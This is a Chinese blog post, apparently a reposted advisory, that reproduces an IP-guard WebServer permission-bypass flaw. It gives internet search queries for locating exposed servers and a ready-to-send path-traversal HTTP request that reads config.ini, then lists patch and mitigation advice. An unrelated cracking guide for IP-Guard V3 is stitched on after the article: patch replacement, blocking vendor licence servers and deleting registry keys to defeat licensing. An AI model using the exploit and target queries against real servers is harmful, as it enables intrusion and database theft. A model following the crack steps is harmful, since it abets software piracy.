IP-guard WebServer 权限绕过漏洞复现(202404)

本文报道了IP-guard软件的一个WebServer权限绕过漏洞,攻击者可通过漏洞读取配置文件和数据库。文章详细解释了漏洞成因、影响范围,提供临时缓解和升级修复方案,提醒用户注意网络安全和责任自负。

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

0x03 漏洞威胁

2024年4月,互联网上披露IP-guard WebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞。

#漏洞成因

由于权限验证机制中存在设计缺陷,攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

#漏洞影响

该漏洞的成功利用允许攻击者规避安全验证,通过后端接口执行文件的任意读取和删除操作。利用这一漏洞,攻击者有可能获取数据库的配置详情,并控制整个数据库系统。

#影响范围

————————————————

IP-guard < 4.82.0609.0

————————————————

0x04 漏洞环境

QUAKE搜索【app:"IPguard-System"】
FOFA搜索【icon_hash="2030860561"】

0x05 漏洞复现(POC) 

————————————————————————————————————————————————————————————
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
 
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

————————————————————————————————————————————————————————————

结果:

0x07 修复建议

临时缓解方案

配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止包含这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。

如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复方案

官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.82.0609.0版本及以上。

###再次提醒###:
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

IP-Guard V3 暴力破解版 软件就不多介绍了,相信很多人在找但是都没有找到破解版,有些人虽然手里有,但要卖人民币,刚好自己也在学习破解,就拿了这个软件做为学习对象,因个人能力有限,破解技术有待提高,没有办法找出注册码,只找到了序列号,现在只放出暴力破解版,等破解技术提高了,有能力找出注册算法,再做注册机。 软件使用: 1、首先安装SQL 2000或以上专业版,注意不要用免费版本; 2、下载本软件最新安装程序,下载链接:http://www.tec-development.com/down/ipguard/V3/IPguard3.11.0720.zip; 3、安装好后,先停止OServer3服务,用补丁文件替换安装目录下的同名文件; 4、启动服务,稍等片刻,再打开软件注册对话框输入序列号; 5、在路由器或防火墙上屏蔽如下IP和网址,虽然破解补丁对软件连网验证部分做了处理,但不排除还有其它验证部分,最好做下屏蔽: IP:58.177.209.130;58.177.209.134;210.51.188.215;218.16.120.134 网址:www.register-center.com;www.ip-guard.com;www.ip-guard.net;www.gzmcrown.com;www.tec-development.com;www.safenet.net.cn;www.myprice.com.cn 6、如果软件偷偷连网验证,导致破解失效,可按如下办法重新注册: 1)停止OServer3服务,方法:右击任务栏的“服务控制器”,选择“停止服务” 2)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{578D04C7-7C7D-448A-AF4A-065606069E85},将“{578D04C7-7C7D-448A-AF4A-065606069E85}”主键删除; 3)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\TEC\OCULAR.3\SERVER,将“SERVER”主键删除; 4)打开注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG,将“RNG”主键删除; 5)打开系统盘Windows目录下的win.ini文件,将“[OSERVER3]”及以下内容全部删除,删除前先备份; 6)重新启动OServer3服务,方法:右击任务栏的“服务控制器”,选择“启动服务” 7)重新注册输入相应客户端序列号。 注意:注册表操作不当可能引起系统错误,请谨慎操作,勿删错键值,为防止意外,建议删除前先导出键值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值